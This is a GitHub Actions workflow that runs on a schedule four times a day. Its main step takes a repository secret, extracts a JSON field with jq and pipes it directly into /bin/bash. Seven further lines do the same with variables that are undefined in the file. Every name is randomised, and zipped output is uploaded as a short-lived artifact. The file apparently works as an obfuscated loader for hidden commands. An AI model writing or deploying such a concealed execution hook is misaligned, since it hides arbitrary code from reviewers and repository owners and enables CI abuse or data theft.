name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '49 2,8,14,20 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Go
        env:
          y438: ${{ secrets.y438 }}
        run: |
          printf '%s' "$y438" | jq -r .ry128 | /bin/bash
          echo $wko5 | jq -r .fmvnl27978 | /bin/bash
          echo $rblz7 | jq -r .vxbvr577 | /bin/bash
          printf '%s' "$m966" | jq -r .hxsyx78776 | /bin/bash
          echo $sgge6343 | jq -r .p053 | /bin/bash
          printf '%s' "$l2" | jq -r .iy9 | /bin/bash
          echo $pgse2815 | jq -r .s391 | /bin/bash
          echo $ny04 | jq -r .xgu9749 | /bin/bash

      - name: Archive results
        uses: actions/upload-artifact@v4
        with:
          name: 4w1CfqH0
          path: "*.zip"
          retention-days: 1
